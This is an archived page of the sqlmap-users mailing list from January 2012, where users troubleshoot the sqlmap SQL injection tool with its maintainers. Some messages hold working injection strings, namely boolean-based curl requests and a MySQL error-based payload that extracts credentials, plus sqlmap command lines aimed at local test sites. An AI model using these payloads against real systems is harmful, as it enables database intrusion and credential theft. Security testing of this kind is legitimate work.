sqlmap-users Mailing List for sqlmap (Page 70)
Brought to you by:
inquisb
Menu
▾
▴
sqlmap-users — sqlmap users mailing list
You can subscribe to this list here.
| 2008 |
Jan
|
Feb
|
Mar
|
Apr
|
May
|
Jun
|
Jul
|
Aug
|
Sep
(4) |
Oct
(11) |
Nov
(24) |
Dec
(13) |
|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 2009 |
Jan
(23) |
Feb
(17) |
Mar
(13) |
Apr
(48) |
May
(22) |
Jun
(18) |
Jul
(22) |
Aug
(13) |
Sep
(23) |
Oct
(6) |
Nov
(11) |
Dec
(25) |
| 2010 |
Jan
(21) |
Feb
(33) |
Mar
(61) |
Apr
(47) |
May
(48) |
Jun
(30) |
Jul
(24) |
Aug
(37) |
Sep
(52) |
Oct
(59) |
Nov
(32) |
Dec
(57) |
| 2011 |
Jan
(166) |
Feb
(93) |
Mar
(65) |
Apr
(117) |
May
(87) |
Jun
(124) |
Jul
(102) |
Aug
(78) |
Sep
(65) |
Oct
(22) |
Nov
(71) |
Dec
(79) |
| 2012 |
Jan
(93) |
Feb
(55) |
Mar
(45) |
Apr
(49) |
May
(56) |
Jun
(93) |
Jul
(95) |
Aug
(42) |
Sep
(26) |
Oct
(36) |
Nov
(32) |
Dec
(46) |
| 2013 |
Jan
(36) |
Feb
(78) |
Mar
(38) |
Apr
(57) |
May
(35) |
Jun
(39) |
Jul
(23) |
Aug
(33) |
Sep
(28) |
Oct
(38) |
Nov
(22) |
Dec
(16) |
| 2014 |
Jan
(33) |
Feb
(23) |
Mar
(41) |
Apr
(29) |
May
(12) |
Jun
(20) |
Jul
(21) |
Aug
(23) |
Sep
(18) |
Oct
(34) |
Nov
(12) |
Dec
(39) |
| 2015 |
Jan
(2) |
Feb
(51) |
Mar
(10) |
Apr
(28) |
May
(9) |
Jun
(22) |
Jul
(32) |
Aug
(35) |
Sep
(29) |
Oct
(50) |
Nov
(8) |
Dec
(2) |
| 2016 |
Jan
(8) |
Feb
(2) |
Mar
(3) |
Apr
(14) |
May
|
Jun
|
Jul
|
Aug
(12) |
Sep
|
Oct
|
Nov
(1) |
Dec
(19) |
| 2017 |
Jan
|
Feb
(18) |
Mar
|
Apr
(1) |
May
|
Jun
|
Jul
|
Aug
(4) |
Sep
|
Oct
|
Nov
(2) |
Dec
|
| 2018 |
Jan
|
Feb
|
Mar
(1) |
Apr
(1) |
May
(3) |
Jun
|
Jul
|
Aug
|
Sep
|
Oct
|
Nov
|
Dec
|
| 2019 |
Jan
|
Feb
|
Mar
|
Apr
(3) |
May
|
Jun
|
Jul
|
Aug
|
Sep
|
Oct
|
Nov
|
Dec
|
|
From: Miroslav S. <mir...@gm...> - 2012-01-07 16:24:42
|
Hi. This looks strange: 1'%20OR 1=1 AND 1='1 and 1' OR 1=1 AND 1='2 Could you please try to find the simplest vectors/payloads that work, e.g.: 1' AND '1'='1 1' AND '1'='2 >From this payloads I am not sure why is there OR 1=1 and how is this evaluated to True or False (as OR 1=1 should evaluate in normal cases to True in both vectors you've sent) Kind regards On Sat, Jan 7, 2012 at 5:10 PM, cats <du...@al...> wrote: > Ok so I know that my site has an sqli (and boolean/mysql time based). > I even tried both of them myself and the results are very clear and > simple, yet sqlmap doesn't seem to see it. It can find the time based at > first, but it always ends up saying that it's a false positive. > > cURL will give me the following result from the page, using "and boolean > based sqli" with a true statement: > > curl --data "lostpass=1'%20OR 1=1 AND 1='1" > http://localhost/account/index.php > > <div class='message' style='padding:10px;'>Your password was e-mailed to > 1' OR 1='1</div> > > > And now a false one > > curl --data "lostpass=1' OR 1=1 AND 1='2" > http://localhost/account/index.php > > > <td class='message'>The email address you entered 1' OR 1=1 AND 1='2 > does not exist</p> > > > I have tried with --string and --text-only with sqlmap, but I get the > same results over and over. Here's some sample output: > > python sqlmap.py -u "http://localhost/account/index.php" --random-agent > --data="lostpass=1' OR 1='1" --string="Your password was e-mailed to" > --text-only --delay=5 --technique=TB > > > [16:57:34] [INFO] testing connection to the target url > [16:57:49] [INFO] heuristics detected web page charset 'ascii' > [16:57:50] [INFO] testing if the provided string is within the target > URL page content > [16:57:56] [INFO] testing if POST parameter 'lostpass' is dynamic > [16:58:05] [INFO] confirming that POST parameter 'lostpass' is dynamic > [16:58:13] [INFO] POST parameter 'lostpass' is dynamic > [16:58:19] [WARNING] heuristic test shows that POST parameter 'lostpass' > might not be injectable > [16:58:19] [INFO] testing sql injection on POST parameter 'lostpass' > [16:58:19] [INFO] testing 'AND boolean-based blind - WHERE or HAVING > clause' > [16:59:21] [INFO] testing 'MySQL > 5.0.11 AND time-based blind' > [17:00:48] [INFO] POST parameter 'lostpass' is 'MySQL > 5.0.11 AND > time-based blind' injectable > [17:00:48] [INFO] checking if the injection point on POST parameter > 'lostpass' is a false positive > [17:03:09] [WARNING] false positive injection point detected > [17:03:09] [WARNING] POST parameter 'lostpass' is not injectable > [17:03:09] [CRITICAL] all parameters appear to be not injectable. > > I tried with a sleep(5) injection manually as well, and it works like a > charm. Any ideas? > > > > > > > > > ------------------------------------------------------------------------------ > Ridiculously easy VDI. With Citrix VDI-in-a-Box, you don't need a complex > infrastructure or vast IT resources to deliver seamless, secure access to > virtual desktops. With this all-in-one solution, easily deploy virtual > desktops for less than the cost of PCs and save 60% on VDI infrastructure > costs. Try it free! http://p.sf.net/sfu/Citrix-VDIinabox > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > -- Miroslav Stampar http://about.me/stamparm |
|
From: cats <du...@al...> - 2012-01-07 16:10:54
|
Ok so I know that my site has an sqli (and boolean/mysql time based). I even tried both of them myself and the results are very clear and simple, yet sqlmap doesn't seem to see it. It can find the time based at first, but it always ends up saying that it's a false positive. cURL will give me the following result from the page, using "and boolean based sqli" with a true statement: curl --data "lostpass=1'%20OR 1=1 AND 1='1" http://localhost/account/index.php <div class='message' style='padding:10px;'>Your password was e-mailed to 1' OR 1='1</div> And now a false one curl --data "lostpass=1' OR 1=1 AND 1='2" http://localhost/account/index.php <td class='message'>The email address you entered 1' OR 1=1 AND 1='2 does not exist</p> I have tried with --string and --text-only with sqlmap, but I get the same results over and over. Here's some sample output: python sqlmap.py -u "http://localhost/account/index.php" --random-agent --data="lostpass=1' OR 1='1" --string="Your password was e-mailed to" --text-only --delay=5 --technique=TB [16:57:34] [INFO] testing connection to the target url [16:57:49] [INFO] heuristics detected web page charset 'ascii' [16:57:50] [INFO] testing if the provided string is within the target URL page content [16:57:56] [INFO] testing if POST parameter 'lostpass' is dynamic [16:58:05] [INFO] confirming that POST parameter 'lostpass' is dynamic [16:58:13] [INFO] POST parameter 'lostpass' is dynamic [16:58:19] [WARNING] heuristic test shows that POST parameter 'lostpass' might not be injectable [16:58:19] [INFO] testing sql injection on POST parameter 'lostpass' [16:58:19] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' [16:59:21] [INFO] testing 'MySQL > 5.0.11 AND time-based blind' [17:00:48] [INFO] POST parameter 'lostpass' is 'MySQL > 5.0.11 AND time-based blind' injectable [17:00:48] [INFO] checking if the injection point on POST parameter 'lostpass' is a false positive [17:03:09] [WARNING] false positive injection point detected [17:03:09] [WARNING] POST parameter 'lostpass' is not injectable [17:03:09] [CRITICAL] all parameters appear to be not injectable. I tried with a sleep(5) injection manually as well, and it works like a charm. Any ideas? |
|
From: Nicolas K. <kr...@de...> - 2012-01-07 16:04:12
|
Hi again, Really thanks for the fast response, great work ! Regards, Nicolas On Sat, Jan 7, 2012 at 5:14 PM, Miroslav Stampar <mir...@gm... > wrote: > Hi Nicolas. > > Please update to the latest revision from our SVN repository and run > sqlmap with: > --headers="client-ip: 123.123.123.123\nx-forwarded-for: blalbla..." > > Kind regards, > Miroslav Stampar > > On Fri, Jan 6, 2012 at 9:26 PM, Nicolas Krassas <kr...@de...>wrote: > >> Hi all, >> >> I would like to ask if there is a way to specify "client-ip" as >> additional header value, also if the following header values are supported, >> "via", "x-forwarded-for" and "accepted-language". >> >> Thanks in advance >> Nicolas >> >> >> ------------------------------------------------------------------------------ >> Ridiculously easy VDI. With Citrix VDI-in-a-Box, you don't need a complex >> infrastructure or vast IT resources to deliver seamless, secure access to >> virtual desktops. With this all-in-one solution, easily deploy virtual >> desktops for less than the cost of PCs and save 60% on VDI infrastructure >> costs. Try it free! http://p.sf.net/sfu/Citrix-VDIinabox >> _______________________________________________ >> sqlmap-users mailing list >> sql...@li... >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >> >> > > > -- > Miroslav Stampar > http://about.me/stamparm > |
|
From: Miroslav S. <mir...@gm...> - 2012-01-07 15:36:35
|
Hi Ryan. You are advised to use auxiliary switches in this kind of cases: --string or --text-only could help you here Kind regards, Miroslav Stampar On Fri, Jan 6, 2012 at 5:52 PM, ryan cartner <rya...@gm...> wrote: > I'm testing this cornerstone cms vuln > > http://www.exploit-db.com/exploits/18319/ > > when i load this url (http://192.168.1.101/default.asp?id=2%27) manually > in my browser I get > > Microsoft JET Database Engine error '80040e14' > > Syntax error in string in query expression 'Id=2''. > sqlmap doesn't find anything: > > [11:48:01] [INFO] testing connection to the target url > [11:48:02] [INFO] testing if the url is stable, wait a few seconds > [11:48:04] [INFO] url is stable > [11:48:04] [INFO] testing if GET parameter 'id' is dynamic > [11:48:04] [INFO] heuristics detected web page charset 'ascii' > [11:48:05] [INFO] confirming that GET parameter 'id' is dynamic > [11:48:05] [INFO] GET parameter 'id' is dynamic > [11:48:06] [INFO] heuristic test shows that GET parameter 'id' might be > injectable (possible DBMS: Microsoft Access) > [11:48:06] [INFO] testing sql injection on GET parameter 'id' > [11:48:06] [INFO] testing 'AND boolean-based blind - WHERE or HAVING > clause' > parsed error message(s) showed that the back-end DBMS could be Microsoft > Access. Do you want to skip test payloads specific for other DBMSes? [Y/n] > [11:48:11] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' > [11:48:28] [WARNING] GET parameter 'id' is not injectable > [11:48:28] [CRITICAL] all parameters appear to be not injectable. Try to > increase --level/--risk values to perform more tests. Rerun by providing > either a valid --string or a valid --regexp, refer to the user's manual for > details > [11:48:28] [WARNING] HTTP error codes detected during testing: > 500 (Internal Server Error) - 47 times > > [*] shutting down at: 11:48:28 > > > > ------------------------------------------------------------------------------ > Ridiculously easy VDI. With Citrix VDI-in-a-Box, you don't need a complex > infrastructure or vast IT resources to deliver seamless, secure access to > virtual desktops. With this all-in-one solution, easily deploy virtual > desktops for less than the cost of PCs and save 60% on VDI infrastructure > costs. Try it free! http://p.sf.net/sfu/Citrix-VDIinabox > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > -- Miroslav Stampar http://about.me/stamparm |
|
From: Miroslav S. <mir...@gm...> - 2012-01-07 15:21:57
|
Hi Cats. Just tried on MySQL/Error test case and it appears ok. Could you please send exact command line(s) you've used (without target url)? Please, use --flush-session as part of the first run. Kind regards, Miroslav Stampar On Sat, Jan 7, 2012 at 1:06 AM, cats <du...@al...> wrote: > Hello! > > I was playing around with sqlmap at home, and I noticed all of a sudden > that I couldn't get it to extract any columns or rows all of a sudden. > Database names, current users, tables and such works fine, but > extracting any columns with --dump doesn't work, and thus not getting > any rows either. --columns seems to work though, although if I do that > first and then --dump, it still wont work. > > Here's some output from sqlmap: > > At revision 4654. > > [00:47:11] [INFO] fetching columns 'strTest1, strTest2' for table 'test' > on database 'testDB' > [00:47:11] [ERROR] unable to retrieve the number of columns for table > 'test' on database 'testDB' > [00:47:11] [ERROR] unable to retrieve the columns for any table on > database 'testDB' > [00:47:11] [INFO] fetching column(s) 'strTest1, strTest2' entries for > table 'test' on database 'testDB' > [00:47:13] [WARNING] the SQL query provided does not return any output > [00:47:13] [INFO] analyzing table dump for possible password hashes > Database: testDB > Table: test > [0 entries] > +----------+----------+ > | strTest1 | strTest2 | > +----------+----------+ > +----------+----------+ > > > The vulnerability used by sqlmap is the following error based one: > > --- > Place: GET > Parameter: q > Type: error-based > Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause > Payload: q=2) AND (SELECT 2155 FROM(SELECT > COUNT(*),CONCAT(0x3a6275763a,(SELECT (CASE WHEN (2155=2155) THEN 1 ELSE > 0 END)),0x3a6b73693a,FLOOR(RAND(0)*2))x FROM > INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND (3039=3039 > --- > > And if I try to extract data manually through my browser, then it works > perfectly: > > Notice the extracted data: te...@ma...:aPassword > > Duplicate entry te...@ma...:aPassword :gtb:1' for key 'group_key' > select * from test WHERE (StrTest1 = 2) AND (SELECT 2557 FROM(SELECT > COUNT(*),CONCAT(strTest1,':',strTest2,(SELECT (CASE WHEN (2557=2557) > THEN 1 ELSE 0 END)),0x3a6774623a,FLOOR(RAND(0)*2))x FROM testDB.test > GROUP BY x)a) AND (8882=8882 AND fuser2 = 2) OR (test1 = 2 AND test2 = > 2) AND (SELECT 2557 FROM(SELECT > COUNT(*),CONCAT(strTest1,strTest2,(SELECT (CASE WHEN (2557=2557) THEN 1 > ELSE 0 END)),0x3a6774623a,FLOOR(RAND(0)*2))x FROM testDB.test GROUP BY > x)a) AND (8882=8882) > > PS: I tried specifying with "-C strTest1,strTest2" as well > > Any ideas? :-) > > Thanks in advance, and thanks for a great tool (helps me a lot in my > work, and saves me time from having to write my own scripts all the time > to test my software)! > > > > ------------------------------------------------------------------------------ > Ridiculously easy VDI. With Citrix VDI-in-a-Box, you don't need a complex > infrastructure or vast IT resources to deliver seamless, secure access to > virtual desktops. With this all-in-one solution, easily deploy virtual > desktops for less than the cost of PCs and save 60% on VDI infrastructure > costs. Try it free! http://p.sf.net/sfu/Citrix-VDIinabox > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > -- Miroslav Stampar http://about.me/stamparm |
|
From: Miroslav S. <mir...@gm...> - 2012-01-07 15:14:53
|
Hi Nicolas. Please update to the latest revision from our SVN repository and run sqlmap with: --headers="client-ip: 123.123.123.123\nx-forwarded-for: blalbla..." Kind regards, Miroslav Stampar On Fri, Jan 6, 2012 at 9:26 PM, Nicolas Krassas <kr...@de...> wrote: > Hi all, > > I would like to ask if there is a way to specify "client-ip" as > additional header value, also if the following header values are supported, > "via", "x-forwarded-for" and "accepted-language". > > Thanks in advance > Nicolas > > > ------------------------------------------------------------------------------ > Ridiculously easy VDI. With Citrix VDI-in-a-Box, you don't need a complex > infrastructure or vast IT resources to deliver seamless, secure access to > virtual desktops. With this all-in-one solution, easily deploy virtual > desktops for less than the cost of PCs and save 60% on VDI infrastructure > costs. Try it free! http://p.sf.net/sfu/Citrix-VDIinabox > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > -- Miroslav Stampar http://about.me/stamparm |
|
From: Bernardo D. A. G. <ber...@gm...> - 2012-01-07 13:31:03
|
Hi Nicolas, There is a switch to specify any additional header to your requests. I recommend you either specify them in the .conf file or provide sqlmap with the raw request in a text file with -r switch. Given there are no bugs, sqlmap will process the request and replay it with the exact same headers, please do report bugs if any here. Bernardo Damele A. G. This message was sent from a smartphone On 6 Jan 2012, at 20:51, Nicolas Krassas <kr...@de...> wrote: > Hi all, > > I would like to ask if there is a way to specify "client-ip" as additional header value, also if the following header values are supported, "via", "x-forwarded-for" and "accepted-language". > > Thanks in advance > Nicolas > ------------------------------------------------------------------------------ > Ridiculously easy VDI. With Citrix VDI-in-a-Box, you don't need a complex > infrastructure or vast IT resources to deliver seamless, secure access to > virtual desktops. With this all-in-one solution, easily deploy virtual > desktops for less than the cost of PCs and save 60% on VDI infrastructure > costs. Try it free! http://p.sf.net/sfu/Citrix-VDIinabox > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users |
|
From: cats <du...@al...> - 2012-01-07 00:06:28
|
Hello!
I was playing around with sqlmap at home, and I noticed all of a sudden
that I couldn't get it to extract any columns or rows all of a sudden.
Database names, current users, tables and such works fine, but
extracting any columns with --dump doesn't work, and thus not getting
any rows either. --columns seems to work though, although if I do that
first and then --dump, it still wont work.
Here's some output from sqlmap:
At revision 4654.
[00:47:11] [INFO] fetching columns 'strTest1, strTest2' for table 'test'
on database 'testDB'
[00:47:11] [ERROR] unable to retrieve the number of columns for table
'test' on database 'testDB'
[00:47:11] [ERROR] unable to retrieve the columns for any table on
database 'testDB'
[00:47:11] [INFO] fetching column(s) 'strTest1, strTest2' entries for
table 'test' on database 'testDB'
[00:47:13] [WARNING] the SQL query provided does not return any output
[00:47:13] [INFO] analyzing table dump for possible password hashes
Database: testDB
Table: test
[0 entries]
+----------+----------+
| strTest1 | strTest2 |
+----------+----------+
+----------+----------+
The vulnerability used by sqlmap is the following error based one:
---
Place: GET
Parameter: q
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: q=2) AND (SELECT 2155 FROM(SELECT
COUNT(*),CONCAT(0x3a6275763a,(SELECT (CASE WHEN (2155=2155) THEN 1 ELSE
0 END)),0x3a6b73693a,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND (3039=3039
---
And if I try to extract data manually through my browser, then it works
perfectly:
Notice the extracted data: te...@ma...:aPassword
Duplicate entry te...@ma...:aPassword :gtb:1' for key 'group_key'
select * from test WHERE (StrTest1 = 2) AND (SELECT 2557 FROM(SELECT
COUNT(*),CONCAT(strTest1,':',strTest2,(SELECT (CASE WHEN (2557=2557)
THEN 1 ELSE 0 END)),0x3a6774623a,FLOOR(RAND(0)*2))x FROM testDB.test
GROUP BY x)a) AND (8882=8882 AND fuser2 = 2) OR (test1 = 2 AND test2 =
2) AND (SELECT 2557 FROM(SELECT
COUNT(*),CONCAT(strTest1,strTest2,(SELECT (CASE WHEN (2557=2557) THEN 1
ELSE 0 END)),0x3a6774623a,FLOOR(RAND(0)*2))x FROM testDB.test GROUP BY
x)a) AND (8882=8882)
PS: I tried specifying with "-C strTest1,strTest2" as well
Any ideas? :-)
Thanks in advance, and thanks for a great tool (helps me a lot in my
work, and saves me time from having to write my own scripts all the time
to test my software)!
|
|
From: Jimmy R. <jr...@al...> - 2012-01-06 23:56:00
|
Hello!
I was playing around with sqlmap at home, and I noticed all of a sudden
that I couldn't get it to extract any columns or rows all of a sudden.
Database names, current users, tables and such works fine, but
extracting any columns with --dump doesn't work, and thus not getting
any rows either. --columns seems to work though, although if I do that
first and then --dump, it still wont work.
Here's some output from sqlmap:
At revision 4654.
[00:47:11] [INFO] fetching columns 'strTest1, strTest2' for table 'test'
on database 'testDB'
[00:47:11] [ERROR] unable to retrieve the number of columns for table
'test' on database 'testDB'
[00:47:11] [ERROR] unable to retrieve the columns for any table on
database 'testDB'
[00:47:11] [INFO] fetching column(s) 'strTest1, strTest2' entries for
table 'test' on database 'testDB'
[00:47:13] [WARNING] the SQL query provided does not return any output
[00:47:13] [INFO] analyzing table dump for possible password hashes
Database: testDB
Table: test
[0 entries]
+----------+----------+
| strTest1 | strTest2 |
+----------+----------+
+----------+----------+
The vulnerability used by sqlmap is the following error based one:
---
Place: GET
Parameter: q
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: q=2) AND (SELECT 2155 FROM(SELECT
COUNT(*),CONCAT(0x3a6275763a,(SELECT (CASE WHEN (2155=2155) THEN 1 ELSE
0 END)),0x3a6b73693a,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND (3039=3039
---
And if I try to extract data manually through my browser, then it works
perfectly:
Notice the extracted data: te...@ma...:aPassword
Duplicate entry te...@ma...:aPassword :gtb:1' for key 'group_key'
select * from test WHERE (StrTest1 = 2) AND (SELECT 2557 FROM(SELECT
COUNT(*),CONCAT(strTest1,':',strTest2,(SELECT (CASE WHEN (2557=2557)
THEN 1 ELSE 0 END)),0x3a6774623a,FLOOR(RAND(0)*2))x FROM testDB.test
GROUP BY x)a) AND (8882=8882 AND fuser2 = 2) OR (test1 = 2 AND test2 =
2) AND (SELECT 2557 FROM(SELECT
COUNT(*),CONCAT(strTest1,strTest2,(SELECT (CASE WHEN (2557=2557) THEN 1
ELSE 0 END)),0x3a6774623a,FLOOR(RAND(0)*2))x FROM testDB.test GROUP BY
x)a) AND (8882=8882)
PS: I tried specifying with "-C strTest1,strTest2" as well
Any ideas? :-)
Thanks in advance, and thanks for a great tool (helps me a lot in my
work, and saves me time from having to write my own scripts all the time
to test my software)!
|
|
From: Nicolas K. <kr...@de...> - 2012-01-06 20:51:00
|
Hi all, I would like to ask if there is a way to specify "client-ip" as additional header value, also if the following header values are supported, "via", "x-forwarded-for" and "accepted-language". Thanks in advance Nicolas |
|
From: ryan c. <rya...@gm...> - 2012-01-06 16:52:22
|
I'm testing this cornerstone cms vuln http://www.exploit-db.com/exploits/18319/ when i load this url (http://192.168.1.101/default.asp?id=2%27) manually in my browser I get Microsoft JET Database Engine error '80040e14' Syntax error in string in query expression 'Id=2''. sqlmap doesn't find anything: [11:48:01] [INFO] testing connection to the target url [11:48:02] [INFO] testing if the url is stable, wait a few seconds [11:48:04] [INFO] url is stable [11:48:04] [INFO] testing if GET parameter 'id' is dynamic [11:48:04] [INFO] heuristics detected web page charset 'ascii' [11:48:05] [INFO] confirming that GET parameter 'id' is dynamic [11:48:05] [INFO] GET parameter 'id' is dynamic [11:48:06] [INFO] heuristic test shows that GET parameter 'id' might be injectable (possible DBMS: Microsoft Access) [11:48:06] [INFO] testing sql injection on GET parameter 'id' [11:48:06] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' parsed error message(s) showed that the back-end DBMS could be Microsoft Access. Do you want to skip test payloads specific for other DBMSes? [Y/n] [11:48:11] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' [11:48:28] [WARNING] GET parameter 'id' is not injectable [11:48:28] [CRITICAL] all parameters appear to be not injectable. Try to increase --level/--risk values to perform more tests. Rerun by providing either a valid --string or a valid --regexp, refer to the user's manual for details [11:48:28] [WARNING] HTTP error codes detected during testing: 500 (Internal Server Error) - 47 times [*] shutting down at: 11:48:28 |
|
From: Bernardo D. A. G. <ber...@gm...> - 2012-01-06 16:42:42
|
--batch On 6 January 2012 16:40, Daniel Nickless <da...@1u...> wrote: > Hi, > > Just wondering if there's a way to run sqlmap such that it uses the default > answer for each prompt, rather than requiring me to press return every time! > > Thanks for any help :) > > Dan -- Bernardo Damele A. G. Homepage: http://about.me/inquis E-mail / Jabber: bernardo.damele (at) gmail.com Mobile: +447788962949 (UK 07788962949) |
|
From: Bernardo D. A. G. <ber...@gm...> - 2012-01-06 16:42:26
|
It looks to me like a network connection problem. The SVN server is up to me. Bernardo On 6 January 2012 16:23, ryan cartner <rya...@gm...> wrote: > sqlmap version: 1.0-dev (r4009) > Python version: 2.6.5 > Operating system: posix > Command line: sqlmap.py --update > Technique: None > Back-end DBMS: None (identified) > Traceback (most recent call last): > File "sqlmap.py", line 78, in main > init(cmdLineOptions) > File "/pentest/database/sqlmap/lib/core/option.py", line 1752, in init > update() > File "/pentest/database/sqlmap/lib/core/update.py", line 71, in update > client.update(rootDir) > ClientError: OPTIONS of 'https://svn.sqlmap.org/sqlmap/trunk/sqlmap': could > not connect to server (https://svn.sqlmap.org) > > [*] shutting down at: 11:22:16 > > > ------------------------------------------------------------------------------ > Ridiculously easy VDI. With Citrix VDI-in-a-Box, you don't need a complex > infrastructure or vast IT resources to deliver seamless, secure access to > virtual desktops. With this all-in-one solution, easily deploy virtual > desktops for less than the cost of PCs and save 60% on VDI infrastructure > costs. Try it free! http://p.sf.net/sfu/Citrix-VDIinabox > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > -- Bernardo Damele A. G. Homepage: http://about.me/inquis E-mail / Jabber: bernardo.damele (at) gmail.com Mobile: +447788962949 (UK 07788962949) |
|
From: Daniel N. <da...@1u...> - 2012-01-06 16:41:08
|
Hi, Just wondering if there's a way to run sqlmap such that it uses the default answer for each prompt, rather than requiring me to press return every time! Thanks for any help :) Dan |
|
From: ryan c. <rya...@gm...> - 2012-01-06 16:23:26
|
sqlmap version: 1.0-dev (r4009)
Python version: 2.6.5
Operating system: posix
Command line: sqlmap.py --update
Technique: None
Back-end DBMS: None (identified)
Traceback (most recent call last):
File "sqlmap.py", line 78, in main
init(cmdLineOptions)
File "/pentest/database/sqlmap/lib/core/option.py", line 1752, in init
update()
File "/pentest/database/sqlmap/lib/core/update.py", line 71, in update
client.update(rootDir)
ClientError: OPTIONS of 'https://svn.sqlmap.org/sqlmap/trunk/sqlmap': could
not connect to server (https://svn.sqlmap.org)
[*] shutting down at: 11:22:16
|
|
From: Gianluca B. <g...@br...> - 2012-01-06 00:25:51
|
Thanks guys! Il giorno 06/gen/2012 00:54, "Miroslav Stampar" <mir...@gm...> ha scritto: > Hi Gianluca. > > There was indeed a minor "glitch" regarding your case. Find it "patched" > with the latest commit (r4653). > > Kind regards, > Miroslav Stampar > > On Thu, Jan 5, 2012 at 2:53 PM, Gianluca Brindisi <g...@br...> wrote: > >> Hello, >> if I provide an URL with * like this: >> >> http://target.com/path/to/index.php?id=12*&action=add&path=/path/to/&imgIndex= >> >> sqlmap don't recognize valid get param in the urls: >> >> [15:34:23] [WARNING] you've provided target url without any GET >> parameters (e.g. www.site.com/article.php?id=1) and without providing >> any POST parameters through --data option >> do you want to try URI injections in the target url itself? [Y/n/q] >> >> But looks like it inject correctly where I placed the wildcard. >> >> Instead without * everything is working fine as usual. >> So I am not sure if it's this some sort of bug or it's me misusing the * >> option (i.e. if the url is not rewrote I should just use -p id). >> >> Thanks, >> Gianluca Brindisi >> >> >> >> ------------------------------------------------------------------------------ >> Ridiculously easy VDI. With Citrix VDI-in-a-Box, you don't need a complex >> infrastructure or vast IT resources to deliver seamless, secure access to >> virtual desktops. With this all-in-one solution, easily deploy virtual >> desktops for less than the cost of PCs and save 60% on VDI infrastructure >> costs. Try it free! http://p.sf.net/sfu/Citrix-VDIinabox >> _______________________________________________ >> sqlmap-users mailing list >> sql...@li... >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >> >> > > > -- > Miroslav Stampar > http://about.me/stamparm > |
|
From: Miroslav S. <mir...@gm...> - 2012-01-05 23:56:18
|
Hi Borja. The error itself doesn't prove anything. You'll have to either: 1) find a valid injection manually and report back so we could fix the sqlmap (if needed) or 2) send us a traffic file which you can get with -t traffic.txt Kind regards, Miroslav Stampar On Thu, Jan 5, 2012 at 4:52 PM, Borja Berastegui <bor...@gm...>wrote: > Hi ! > > Is my first mail to this list, as I'm an active user of the software I had > to start mailing here someday so... here is my question: > > I've found a MySQL error on a website (by a modification in the URL) that > throws me this: > > Warning: mysql_fetch_array(): supplied argument is not a valid MySQL > result resource in /home/virtual/thewebsite.com/web/news/index.php on > line 11 > > The syntax of the url is '' http://www.thewebsite.com/news/today/*/'' and > in the normal state of the URL there is a number (of the news page shown) > where I have writen the *. > > If I write anything that is not a number it returns me the error. > > Im having to problems here: > > First one is that I'm not sure if im doing right the URI inyection with > sqlmap because i've found 3 URI inyections in diferent places but without > success. (Im using the * to show the tool where to test) > > And the other one is that I'm not really sure if that error shows a really > exploitable flaw. > > Sqlmap, by using the * wildcard, throws some possible UNION exploitable > points, but are discarded when finished the tests. I have tried also with > --union-char switch with different characters. > > Sorry for all this text, hope you could help me a bit :S > > Thanks ! > > > ------------------------------------------------------------------------------ > Ridiculously easy VDI. With Citrix VDI-in-a-Box, you don't need a complex > infrastructure or vast IT resources to deliver seamless, secure access to > virtual desktops. With this all-in-one solution, easily deploy virtual > desktops for less than the cost of PCs and save 60% on VDI infrastructure > costs. Try it free! http://p.sf.net/sfu/Citrix-VDIinabox > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > -- Miroslav Stampar http://about.me/stamparm |
|
From: Miroslav S. <mir...@gm...> - 2012-01-05 23:54:13
|
Hi Gianluca. There was indeed a minor "glitch" regarding your case. Find it "patched" with the latest commit (r4653). Kind regards, Miroslav Stampar On Thu, Jan 5, 2012 at 2:53 PM, Gianluca Brindisi <g...@br...> wrote: > Hello, > if I provide an URL with * like this: > > http://target.com/path/to/index.php?id=12*&action=add&path=/path/to/&imgIndex= > > sqlmap don't recognize valid get param in the urls: > > [15:34:23] [WARNING] you've provided target url without any GET parameters > (e.g. www.site.com/article.php?id=1) and without providing any POST > parameters through --data option > do you want to try URI injections in the target url itself? [Y/n/q] > > But looks like it inject correctly where I placed the wildcard. > > Instead without * everything is working fine as usual. > So I am not sure if it's this some sort of bug or it's me misusing the * > option (i.e. if the url is not rewrote I should just use -p id). > > Thanks, > Gianluca Brindisi > > > > ------------------------------------------------------------------------------ > Ridiculously easy VDI. With Citrix VDI-in-a-Box, you don't need a complex > infrastructure or vast IT resources to deliver seamless, secure access to > virtual desktops. With this all-in-one solution, easily deploy virtual > desktops for less than the cost of PCs and save 60% on VDI infrastructure > costs. Try it free! http://p.sf.net/sfu/Citrix-VDIinabox > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > -- Miroslav Stampar http://about.me/stamparm |
|
From: Miroslav S. <mir...@gm...> - 2012-01-05 23:40:52
|
